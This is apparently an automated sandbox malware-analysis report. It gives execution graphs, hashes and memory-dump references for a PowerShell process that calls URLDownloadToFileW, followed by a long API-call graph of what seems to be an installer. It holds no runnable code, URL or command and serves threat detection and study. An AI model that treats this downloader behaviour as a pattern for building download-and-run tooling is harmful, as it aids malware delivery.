                                                                              • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                              • Instruction Fuzzy Hash:

                                                                              Execution Graph

                                                                              Execution Coverage:3.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:4
                                                                              Total number of Limit Nodes:0
Execution graph: 4 nodes starting at 7fe896f7c25; the graph contains a call to URLDownloadToFileW.

Control-flow Graph

Control-flow graph for the function starting at 7fe896f7018; the basic block at 7fe896f7bbb calls URLDownloadToFileW.
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.453910656.000007FE896F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE896F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe896f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: DownloadFile
                                                                              • String ID:
                                                                              • API String ID: 1407266417-0
                                                                              • Opcode ID: 48d40e94c7beed09557972d92943cf1cb116cdcc49ddab45cb2d964aa0bbef93
                                                                              • Instruction ID: 7b20aa320ccb1c906ac2f4089d4699639d1b64140bb39c570b3484cefffac868
                                                                              • Opcode Fuzzy Hash: 48d40e94c7beed09557972d92943cf1cb116cdcc49ddab45cb2d964aa0bbef93
                                                                              • Instruction Fuzzy Hash: E8319E3190CA1C8FDB58EF5C9885BA9B7E1FB69321F00826ED04DD3651CB70B8468B81

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (F\$0cd$0cd$0cd$8F\
                                                                              • API String ID: 0-2897985527
                                                                              • Opcode ID: e04829d0af8dc8c4c24263e2ba2bca7e4c8cd20f160e23febc20bba6e78be20b
                                                                              • Instruction ID: 56e11d1671f8ad65b4ef55c23754403c3bb4822cc36da71486e5d56e67bcc6b0
                                                                              • Opcode Fuzzy Hash: e04829d0af8dc8c4c24263e2ba2bca7e4c8cd20f160e23febc20bba6e78be20b
                                                                              • Instruction Fuzzy Hash: E4C13930A1DAC94FE74AE72C54146BA7FE1EF86398F1501EBD48EC71A3D618AC52C361

Control-flow Graph

Control-flow graph for the function starting at 7fe897c8549 (no API calls recorded in the graph).
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cd$8=d
                                                                              • API String ID: 0-3776316638
                                                                              • Opcode ID: 6fc4862bee268de6095de086620ebc195cb975cdcb2128572b44b9b4b741ed3e
                                                                              • Instruction ID: 32ff5254bdca9b7df7e63cb2ac4492011fdba2ad2509ed9e6f6811701c785f26
                                                                              • Opcode Fuzzy Hash: 6fc4862bee268de6095de086620ebc195cb975cdcb2128572b44b9b4b741ed3e
                                                                              • Instruction Fuzzy Hash: 5522163090DB894FE74ADB2C84517B97BE2FF9A344F2401AED44EC72A3DA25AC56C741

Control-flow Graph

Control-flow graph for the function starting at 7fe897c566d (no API calls recorded in the graph).
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cd$V
                                                                              • API String ID: 0-2552750534
                                                                              • Opcode ID: 99115bf8e977ee9a1eb2307f72bb0cfcd32c596e52009ac603bf7a279eda6368
                                                                              • Instruction ID: ee42a290cadeef6c339469918df5c84d05fe9cb5111aa305d8e30eb10cf1ae4c
                                                                              • Opcode Fuzzy Hash: 99115bf8e977ee9a1eb2307f72bb0cfcd32c596e52009ac603bf7a279eda6368
                                                                              • Instruction Fuzzy Hash: FDD1353080E7C95FE347973898146B67FA0EF97664F0901EBD08DCB0A3D616AD56C3A2

Control-flow Graph

Control-flow graph for the function starting at 7fe897c10d3 (no API calls recorded in the graph).
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8h$xF\
                                                                              • API String ID: 0-2464866062
                                                                              • Opcode ID: 1a092dc708188cbfa05169059a83f2a76a14dbc10d63acbcaf733256f0ef8470
                                                                              • Instruction ID: beb0351726b80649830ba7b17d776053a15c77e1cb2773c6849537860cd0f1a0
                                                                              • Opcode Fuzzy Hash: 1a092dc708188cbfa05169059a83f2a76a14dbc10d63acbcaf733256f0ef8470
                                                                              • Instruction Fuzzy Hash: 8F41D51170EBC90FE34B937C28646657FE1DF8B259B2901EBD58ECB2A3D9094C56C361

Control-flow Graph

Control-flow graph for the function starting at 7fe896f7ae1; the basic block at 7fe896f7bbb calls URLDownloadToFileW.
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.453910656.000007FE896F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE896F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe896f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: DownloadFile
                                                                              • String ID:
                                                                              • API String ID: 1407266417-0
                                                                              • Opcode ID: 5100bbc1bad8f56534a62f7f476b27dfe0760508145f6cea8c5f0cd1ee9f7337
                                                                              • Instruction ID: 18cee8f71256a1a4148150c660949547350a4cee3570eb2db5a837fde509c41d
                                                                              • Opcode Fuzzy Hash: 5100bbc1bad8f56534a62f7f476b27dfe0760508145f6cea8c5f0cd1ee9f7337
                                                                              • Instruction Fuzzy Hash: E241F57080DB889FDB1ADF5898447EABBF0FB56321F0482AFD089D3552CB646806C782

Control-flow Graph

Control-flow graph for the function starting at 7fe896f7c25; the basic block at 7fe896f7bed calls URLDownloadToFileW.
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.453910656.000007FE896F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE896F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe896f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b2d2d648f39dff3df7b0ed9fcadbbd4817ff88e7169651ff95486d589b1b0a5
                                                                              • Instruction ID: 6f4c90c58aebe724748d68bbc80ba4ddc01a873e7c691593fb7aafa86aae8f67
                                                                              • Opcode Fuzzy Hash: 9b2d2d648f39dff3df7b0ed9fcadbbd4817ff88e7169651ff95486d589b1b0a5
                                                                              • Instruction Fuzzy Hash: 2F21D32190E3D25FE7076738A8622E87FA0EF03234F0951E7D098CA4E3D619745AC3A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cd$h.b
                                                                              • API String ID: 0-4021534375
                                                                              • Opcode ID: 06f19f6db49b33ce595c4f04ce4946d021b9f3fc008e1c2ec59ef0f431dfe587
                                                                              • Instruction ID: 027382dbfd343ee77e92ee2405842fb98a7886356ba91ce59664880e13b7f10b
                                                                              • Opcode Fuzzy Hash: 06f19f6db49b33ce595c4f04ce4946d021b9f3fc008e1c2ec59ef0f431dfe587
                                                                              • Instruction Fuzzy Hash: 9FA16B2080EBC90FD747977858246A67FF0EF87358F1901EBD48DCB1A3D619991AC362

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 465 7fe897c3a81-7fe897c3a8d 466 7fe897c3a8f 465->466 467 7fe897c3a90-7fe897c3aa1 465->467 466->467 468 7fe897c3aa3 467->468 469 7fe897c3aa4-7fe897c3acc 467->469 468->469 470 7fe897c3b06-7fe897c3b0e 469->470 471 7fe897c3ace-7fe897c3ad4 469->471 473 7fe897c3b10-7fe897c3b2d 470->473 472 7fe897c3ad6-7fe897c3b05 471->472 471->473 472->470 474 7fe897c3b44 473->474 475 7fe897c3b2f-7fe897c3b42 473->475 476 7fe897c3b46-7fe897c3b48 474->476 475->476 478 7fe897c3c28-7fe897c3c32 476->478 479 7fe897c3b4e-7fe897c3b51 476->479 482 7fe897c3c34-7fe897c3c3e 478->482 483 7fe897c3c3f-7fe897c3c4f 478->483 480 7fe897c3b68 479->480 481 7fe897c3b53-7fe897c3b66 479->481 484 7fe897c3b6a-7fe897c3b6c 480->484 481->484 485 7fe897c3c5c-7fe897c3c80 483->485 486 7fe897c3c51-7fe897c3c55 483->486 484->478 487 7fe897c3b72-7fe897c3b7f 484->487 486->485 488 7fe897c3b93-7fe897c3ba3 487->488 489 7fe897c3b81-7fe897c3b8c 487->489 491 7fe897c3bb7-7fe897c3be5 488->491 492 7fe897c3ba5-7fe897c3bb0 488->492 489->488 494 7fe897c3be7-7fe897c3bfe 491->494 495 7fe897c3c00-7fe897c3c10 491->495 492->491 498 7fe897c3c17-7fe897c3c27 494->498 495->498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Xh)$h.b$h.b$h.b$h.b$h.b$h.b
                                                                              • API String ID: 0-172823724
                                                                              • Opcode ID: cb18efb7b10bf9775f08755d62cb22f647dbfca95c584950073f454b84496c8f
                                                                              • Instruction ID: 868568050089fa2c9eb94ef50819ca68e966e5148a7f0fcb30688462ff856a3e
                                                                              • Opcode Fuzzy Hash: cb18efb7b10bf9775f08755d62cb22f647dbfca95c584950073f454b84496c8f
                                                                              • Instruction Fuzzy Hash: E161161190EBCA4FD757973C18602BA7FA1EF87288F1900E7D089CB0E3D5196819D362

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 656 7fe897c380a-7fe897c3812 657 7fe897c3815-7fe897c388a 656->657 657->657 658 7fe897c388c-7fe897c38b0 657->658 659 7fe897c38e9-7fe897c38f0 658->659 660 7fe897c38b2-7fe897c38b8 658->660 662 7fe897c38f1-7fe897c390f 659->662 661 7fe897c38ba-7fe897c38e8 660->661 660->662 661->659 664 7fe897c3926 662->664 665 7fe897c3911-7fe897c3924 662->665 667 7fe897c3928-7fe897c392a 664->667 665->667 668 7fe897c39da-7fe897c39e4 667->668 669 7fe897c3930-7fe897c3933 667->669 670 7fe897c39e6-7fe897c39f2 668->670 671 7fe897c39f3-7fe897c3a03 668->671 669->668 672 7fe897c3939-7fe897c3941 669->672 675 7fe897c3a05-7fe897c3a09 671->675 676 7fe897c3a10-7fe897c3a36 671->676 673 7fe897c3943-7fe897c394d 672->673 674 7fe897c3951 672->674 677 7fe897c396d-7fe897c39d9 673->677 678 7fe897c394f 673->678 679 7fe897c3956-7fe897c3963 674->679 675->676 678->679 679->677 681 7fe897c3965-7fe897c396b 679->681 681->677
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 88"$Xh)$`k_$h.b$h.b
                                                                              • API String ID: 0-2335438108
                                                                              • Opcode ID: f82f18ff2df51aa5054f0735a64222bd3808b2100b505690260bf9c93acd23eb
                                                                              • Instruction ID: bbb4eb2b1d1d9304c0cd9ccf06b6480a0d399e6ca592a9c29acbf376be65fc2b
                                                                              • Opcode Fuzzy Hash: f82f18ff2df51aa5054f0735a64222bd3808b2100b505690260bf9c93acd23eb
                                                                              • Instruction Fuzzy Hash: 8B81022190EBD60FE753937858216A67FF1DF47294B1E41EBC0C9CB1A3D50A9C4AC362

                                                                              Execution Graph

                                                                              Execution Coverage:23.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:14.9%
                                                                              Total number of Nodes:1364
                                                                              Total number of Limit Nodes:38
                                                                              execution_graph 3279 4015c1 3280 402c37 18 API calls 3279->3280 3281 4015c8 3280->3281 3298 405bc8 CharNextW CharNextW 3281->3298 3283 401631 3285 401663 3283->3285 3286 401636 3283->3286 3284 405b4a CharNextW 3294 4015d1 3284->3294 3289 401423 25 API calls 3285->3289 3312 401423 3286->3312 3296 40165b 3289->3296 3293 40164a SetCurrentDirectoryW 3293->3296 3294->3283 3294->3284 3295 401617 GetFileAttributesW 3294->3295 3304 405819 3294->3304 3307 40577f CreateDirectoryW 3294->3307 3316 4057fc CreateDirectoryW 3294->3316 3295->3294 3299 405be5 3298->3299 3300 405bf7 3298->3300 3299->3300 3301 405bf2 CharNextW 3299->3301 3302 405c1b 3300->3302 3303 405b4a CharNextW 3300->3303 3301->3302 3302->3294 3303->3300 3319 406626 GetModuleHandleA 3304->3319 3308 4057d0 GetLastError 3307->3308 3309 4057cc 3307->3309 3308->3309 3310 4057df SetFileSecurityW 3308->3310 3309->3294 3310->3309 3311 4057f5 GetLastError 3310->3311 3311->3309 3313 4052b0 25 API calls 3312->3313 3314 401431 3313->3314 3315 40624c lstrcpynW 3314->3315 3315->3293 3317 405810 GetLastError 3316->3317 3318 40580c 3316->3318 3317->3318 3318->3294 3320 406642 3319->3320 3321 40664c GetProcAddress 3319->3321 3325 4065b6 GetSystemDirectoryW 3320->3325 3322 405820 3321->3322 3322->3294 3324 406648 3324->3321 3324->3322 3326 4065d8 wsprintfW LoadLibraryExW 3325->3326 3326->3324 3328 401941 3329 401943 3328->3329 3330 402c37 18 API calls 3329->3330 3331 401948 3330->3331 3334 40595a 3331->3334 3373 405c25 3334->3373 3337 405982 DeleteFileW 3342 401951 3337->3342 3338 405999 3340 405ab9 3338->3340 3387 40624c lstrcpynW 3338->3387 3340->3342 3405 40658f FindFirstFileW 3340->3405 3341 4059bf 3343 4059d2 3341->3343 3344 4059c5 lstrcatW 3341->3344 3388 405b69 lstrlenW 3343->3388 3345 4059d8 3344->3345 3348 4059e8 lstrcatW 3345->3348 3350 4059f3 lstrlenW FindFirstFileW 3345->3350 3348->3350 3350->3340 3358 405a15 3350->3358 3351 405ae2 3408 
405b1d lstrlenW CharPrevW 3351->3408 3354 405a9c FindNextFileW 3354->3358 3359 405ab2 FindClose 3354->3359 3355 405912 5 API calls 3357 405af4 3355->3357 3360 405af8 3357->3360 3361 405b0e 3357->3361 3358->3354 3368 405a5d 3358->3368 3392 40624c lstrcpynW 3358->3392 3359->3340 3360->3342 3364 4052b0 25 API calls 3360->3364 3363 4052b0 25 API calls 3361->3363 3363->3342 3366 405b05 3364->3366 3365 40595a 61 API calls 3365->3368 3367 406012 37 API calls 3366->3367 3370 405b0c 3367->3370 3368->3354 3368->3365 3369 4052b0 25 API calls 3368->3369 3371 4052b0 25 API calls 3368->3371 3393 405912 3368->3393 3401 406012 MoveFileExW 3368->3401 3369->3354 3370->3342 3371->3368 3411 40624c lstrcpynW 3373->3411 3375 405c36 3376 405bc8 4 API calls 3375->3376 3377 405c3c 3376->3377 3378 40597a 3377->3378 3379 4064e0 5 API calls 3377->3379 3378->3337 3378->3338 3385 405c4c 3379->3385 3380 405c7d lstrlenW 3381 405c88 3380->3381 3380->3385 3383 405b1d 3 API calls 3381->3383 3382 40658f 2 API calls 3382->3385 3384 405c8d GetFileAttributesW 3383->3384 3384->3378 3385->3378 3385->3380 3385->3382 3386 405b69 2 API calls 3385->3386 3386->3380 3387->3341 3389 405b77 3388->3389 3390 405b89 3389->3390 3391 405b7d CharPrevW 3389->3391 3390->3345 3391->3389 3391->3390 3392->3358 3412 405d19 GetFileAttributesW 3393->3412 3396 405935 DeleteFileW 3399 40593b 3396->3399 3397 40592d RemoveDirectoryW 3397->3399 3398 40593f 3398->3368 3399->3398 3400 40594b SetFileAttributesW 3399->3400 3400->3398 3402 406033 3401->3402 3403 406026 3401->3403 3402->3368 3415 405e98 3403->3415 3406 405ade 3405->3406 3407 4065a5 FindClose 3405->3407 3406->3342 3406->3351 3407->3406 3409 405ae8 3408->3409 3410 405b39 lstrcatW 3408->3410 3409->3355 3410->3409 3411->3375 3413 40591e 3412->3413 3414 405d2b SetFileAttributesW 3412->3414 3413->3396 3413->3397 3413->3398 3414->3413 3416 405ec8 3415->3416 3417 405eee GetShortPathNameW 3415->3417 3442 405d3e GetFileAttributesW CreateFileW 3416->3442 3418 405f03 3417->3418 3419 
40600d 3417->3419 3418->3419 3421 405f0b wsprintfA 3418->3421 3419->3402 3423 40626e 18 API calls 3421->3423 3422 405ed2 CloseHandle GetShortPathNameW 3422->3419 3424 405ee6 3422->3424 3425 405f33 3423->3425 3424->3417 3424->3419 3443 405d3e GetFileAttributesW CreateFileW 3425->3443 3427 405f40 3427->3419 3428 405f4f GetFileSize GlobalAlloc 3427->3428 3429 405f71 3428->3429 3430 406006 CloseHandle 3428->3430 3444 405dc1 ReadFile 3429->3444 3430->3419 3435 405f90 lstrcpyA 3438 405fb2 3435->3438 3436 405fa4 3437 405ca3 4 API calls 3436->3437 3437->3438 3439 405fe9 SetFilePointer 3438->3439 3451 405df0 WriteFile 3439->3451 3442->3422 3443->3427 3445 405ddf 3444->3445 3445->3430 3446 405ca3 lstrlenA 3445->3446 3447 405ce4 lstrlenA 3446->3447 3448 405cbd lstrcmpiA 3447->3448 3449 405cec 3447->3449 3448->3449 3450 405cdb CharNextA 3448->3450 3449->3435 3449->3436 3450->3447 3452 405e0e GlobalFree 3451->3452 3452->3430 3463 401e43 3471 402c15 3463->3471 3465 401e49 3466 402c15 18 API calls 3465->3466 3467 401e55 3466->3467 3468 401e61 ShowWindow 3467->3468 3469 401e6c EnableWindow 3467->3469 3470 402abf 3468->3470 3469->3470 3472 40626e 18 API calls 3471->3472 3473 402c2a 3472->3473 3473->3465 4114 402644 4115 402c15 18 API calls 4114->4115 4122 402653 4115->4122 4116 402790 4117 40269d ReadFile 4117->4116 4117->4122 4118 405dc1 ReadFile 4118->4122 4119 402792 4136 406193 wsprintfW 4119->4136 4120 4026dd MultiByteToWideChar 4120->4122 4122->4116 4122->4117 4122->4118 4122->4119 4122->4120 4124 402703 SetFilePointer MultiByteToWideChar 4122->4124 4126 4027a3 4122->4126 4127 405e1f SetFilePointer 4122->4127 4124->4122 4125 4027c4 SetFilePointer 4125->4116 4126->4116 4126->4125 4128 405e3b 4127->4128 4133 405e57 4127->4133 4129 405dc1 ReadFile 4128->4129 4130 405e47 4129->4130 4131 405e60 SetFilePointer 4130->4131 4132 405e88 SetFilePointer 4130->4132 4130->4133 4131->4132 4134 405e6b 4131->4134 4132->4133 4133->4122 4135 405df0 WriteFile 4134->4135 4135->4133 4136->4116 
3488 402348 3489 402c37 18 API calls 3488->3489 3490 402357 3489->3490 3491 402c37 18 API calls 3490->3491 3492 402360 3491->3492 3493 402c37 18 API calls 3492->3493 3494 40236a GetPrivateProfileStringW 3493->3494 4147 4016cc 4148 402c37 18 API calls 4147->4148 4149 4016d2 GetFullPathNameW 4148->4149 4150 4016ec 4149->4150 4151 40170e 4149->4151 4150->4151 4154 40658f 2 API calls 4150->4154 4152 401723 GetShortPathNameW 4151->4152 4153 402abf 4151->4153 4152->4153 4155 4016fe 4154->4155 4155->4151 4157 40624c lstrcpynW 4155->4157 4157->4151 4158 401b4d 4159 402c37 18 API calls 4158->4159 4160 401b54 4159->4160 4161 402c15 18 API calls 4160->4161 4162 401b5d wsprintfW 4161->4162 4163 402abf 4162->4163 4164 401f52 4165 402c37 18 API calls 4164->4165 4166 401f59 4165->4166 4167 40658f 2 API calls 4166->4167 4168 401f5f 4167->4168 4170 401f70 4168->4170 4171 406193 wsprintfW 4168->4171 4171->4170 4172 402253 4173 402c37 18 API calls 4172->4173 4174 402259 4173->4174 4175 402c37 18 API calls 4174->4175 4176 402262 4175->4176 4177 402c37 18 API calls 4176->4177 4178 40226b 4177->4178 4179 40658f 2 API calls 4178->4179 4180 402274 4179->4180 4181 402285 lstrlenW lstrlenW 4180->4181 4185 402278 4180->4185 4183 4052b0 25 API calls 4181->4183 4182 4052b0 25 API calls 4186 402280 4182->4186 4184 4022c3 SHFileOperationW 4183->4184 4184->4185 4184->4186 4185->4182 4185->4186 4187 401956 4188 402c37 18 API calls 4187->4188 4189 40195d lstrlenW 4188->4189 4190 40258c 4189->4190 4191 406956 4192 4067da 4191->4192 4193 407145 4192->4193 4194 406864 GlobalAlloc 4192->4194 4195 40685b GlobalFree 4192->4195 4196 4068d2 GlobalFree 4192->4196 4197 4068db GlobalAlloc 4192->4197 4194->4192 4194->4193 4195->4194 4196->4197 4197->4192 4197->4193 4198 401d57 GetDlgItem GetClientRect 4199 402c37 18 API calls 4198->4199 4200 401d89 LoadImageW SendMessageW 4199->4200 4201 401da7 DeleteObject 4200->4201 4202 402abf 4200->4202 4201->4202 4203 402dd7 4204 402de9 SetTimer 4203->4204 4206 402e02 
4203->4206 4204->4206 4205 402e57 4206->4205 4207 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4206->4207 4207->4205 4208 4014d7 4209 402c15 18 API calls 4208->4209 4210 4014dd Sleep 4209->4210 4212 402abf 4210->4212 4213 4022d7 4214 4022de 4213->4214 4217 4022f1 4213->4217 4215 40626e 18 API calls 4214->4215 4216 4022eb 4215->4216 4218 4058ae MessageBoxIndirectW 4216->4218 4218->4217 3821 40175c 3822 402c37 18 API calls 3821->3822 3823 401763 3822->3823 3827 405d6d 3823->3827 3825 40176a 3826 405d6d 2 API calls 3825->3826 3826->3825 3828 405d7a GetTickCount GetTempFileNameW 3827->3828 3829 405db0 3828->3829 3830 405db4 3828->3830 3829->3828 3829->3830 3830->3825 4061 4023de 4062 402c37 18 API calls 4061->4062 4063 4023f0 4062->4063 4064 402c37 18 API calls 4063->4064 4065 4023fa 4064->4065 4078 402cc7 4065->4078 4068 402885 4069 402432 4070 40243e 4069->4070 4072 402c15 18 API calls 4069->4072 4073 40245d RegSetValueExW 4070->4073 4075 4030fa 36 API calls 4070->4075 4071 402c37 18 API calls 4074 402428 lstrlenW 4071->4074 4072->4070 4076 402473 RegCloseKey 4073->4076 4074->4069 4075->4073 4076->4068 4079 402ce2 4078->4079 4082 4060e7 4079->4082 4083 4060f6 4082->4083 4084 406101 RegCreateKeyExW 4083->4084 4085 40240a 4083->4085 4084->4085 4085->4068 4085->4069 4085->4071 4219 4047de CoTaskMemFree 4220 405b1d 3 API calls 4219->4220 4221 4047f1 4220->4221 4222 404828 SetDlgItemTextW 4221->4222 4224 40626e 18 API calls 4221->4224 4223 404843 4222->4223 4256 4049eb 4223->4256 4258 405892 GetDlgItemTextW 4223->4258 4225 404810 lstrcmpiW 4224->4225 4225->4222 4227 404821 lstrcatW 4225->4227 4227->4222 4228 404248 8 API calls 4230 4049ff 4228->4230 4229 40486c 4231 405c25 18 API calls 4229->4231 4232 404872 4231->4232 4259 40624c lstrcpynW 4232->4259 4234 404889 4235 406626 5 API calls 4234->4235 4241 404890 4235->4241 4236 4048d1 4260 40624c lstrcpynW 4236->4260 4238 4048d8 4239 405bc8 4 API calls 4238->4239 4240 4048de GetDiskFreeSpaceW 4239->4240 4243 404902 
MulDiv 4240->4243 4245 404929 4240->4245 4241->4236 4244 405b69 2 API calls 4241->4244 4241->4245 4243->4245 4244->4241 4246 40499a 4245->4246 4261 404b35 4245->4261 4248 4049bd 4246->4248 4250 40140b 2 API calls 4246->4250 4272 404203 KiUserCallbackDispatcher 4248->4272 4250->4248 4251 40499c SetDlgItemTextW 4251->4246 4252 40498c 4264 404a6c 4252->4264 4255 4049d9 4255->4256 4273 404609 4255->4273 4256->4228 4258->4229 4259->4234 4260->4238 4262 404a6c 21 API calls 4261->4262 4263 404987 4262->4263 4263->4251 4263->4252 4265 404a85 4264->4265 4266 40626e 18 API calls 4265->4266 4267 404ae9 4266->4267 4268 40626e 18 API calls 4267->4268 4269 404af4 4268->4269 4270 40626e 18 API calls 4269->4270 4271 404b0a lstrlenW wsprintfW SetDlgItemTextW 4270->4271 4271->4246 4272->4255 4274 404617 4273->4274 4275 40461c SendMessageW 4273->4275 4274->4275 4275->4256 3453 402862 3454 402c37 18 API calls 3453->3454 3455 402869 FindFirstFileW 3454->3455 3456 402891 3455->3456 3457 40287c 3455->3457 3461 406193 wsprintfW 3456->3461 3459 40289a 3462 40624c lstrcpynW 3459->3462 3461->3459 3462->3457 4283 401563 4284 402a65 4283->4284 4287 406193 wsprintfW 4284->4287 4286 402a6a 4287->4286 4288 401968 4289 402c15 18 API calls 4288->4289 4290 40196f 4289->4290 4291 402c15 18 API calls 4290->4291 4292 40197c 4291->4292 4293 402c37 18 API calls 4292->4293 4294 401993 lstrlenW 4293->4294 4295 4019a4 4294->4295 4296 4019e5 4295->4296 4300 40624c lstrcpynW 4295->4300 4298 4019d5 4298->4296 4299 4019da lstrlenW 4298->4299 4299->4296 4300->4298 4301 404669 4302 404679 4301->4302 4303 40469f 4301->4303 4304 4041e1 19 API calls 4302->4304 4305 404248 8 API calls 4303->4305 4306 404686 SetDlgItemTextW 4304->4306 4307 4046ab 4305->4307 4306->4303 4308 4027e9 4309 4027f0 4308->4309 4312 402a6a 4308->4312 4310 402c15 18 API calls 4309->4310 4311 4027f7 4310->4311 4313 402806 SetFilePointer 4311->4313 4313->4312 4314 402816 4313->4314 4316 406193 wsprintfW 4314->4316 4316->4312 4317 40166a 4318 
402c37 18 API calls 4317->4318 4319 401670 4318->4319 4320 40658f 2 API calls 4319->4320 4321 401676 4320->4321 4322 401ced 4323 402c15 18 API calls 4322->4323 4324 401cf3 IsWindow 4323->4324 4325 401a20 4324->4325 3636 4053ef 3637 405410 GetDlgItem GetDlgItem GetDlgItem 3636->3637 3638 405599 3636->3638 3681 404216 SendMessageW 3637->3681 3640 4055a2 GetDlgItem CreateThread CloseHandle 3638->3640 3641 4055ca 3638->3641 3640->3641 3684 405383 OleInitialize 3640->3684 3642 4055f5 3641->3642 3644 4055e1 ShowWindow ShowWindow 3641->3644 3645 40561a 3641->3645 3646 405655 3642->3646 3648 405609 3642->3648 3649 40562f ShowWindow 3642->3649 3643 405480 3651 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3643->3651 3683 404216 SendMessageW 3644->3683 3650 404248 8 API calls 3645->3650 3646->3645 3654 405663 SendMessageW 3646->3654 3655 4041ba SendMessageW 3648->3655 3657 405641 3649->3657 3658 40564f 3649->3658 3656 405628 3650->3656 3652 4054f5 3651->3652 3653 4054d9 SendMessageW SendMessageW 3651->3653 3659 405508 3652->3659 3660 4054fa SendMessageW 3652->3660 3653->3652 3654->3656 3661 40567c CreatePopupMenu 3654->3661 3655->3645 3662 4052b0 25 API calls 3657->3662 3663 4041ba SendMessageW 3658->3663 3665 4041e1 19 API calls 3659->3665 3660->3659 3664 40626e 18 API calls 3661->3664 3662->3658 3663->3646 3666 40568c AppendMenuW 3664->3666 3667 405518 3665->3667 3668 4056a9 GetWindowRect 3666->3668 3669 4056bc TrackPopupMenu 3666->3669 3670 405521 ShowWindow 3667->3670 3671 405555 GetDlgItem SendMessageW 3667->3671 3668->3669 3669->3656 3672 4056d7 3669->3672 3673 405544 3670->3673 3674 405537 ShowWindow 3670->3674 3671->3656 3675 40557c SendMessageW SendMessageW 3671->3675 3676 4056f3 SendMessageW 3672->3676 3682 404216 SendMessageW 3673->3682 3674->3673 3675->3656 3676->3676 3677 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3676->3677 3679 405735 SendMessageW 3677->3679 3679->3679 3680 40575e GlobalUnlock SetClipboardData CloseClipboard 
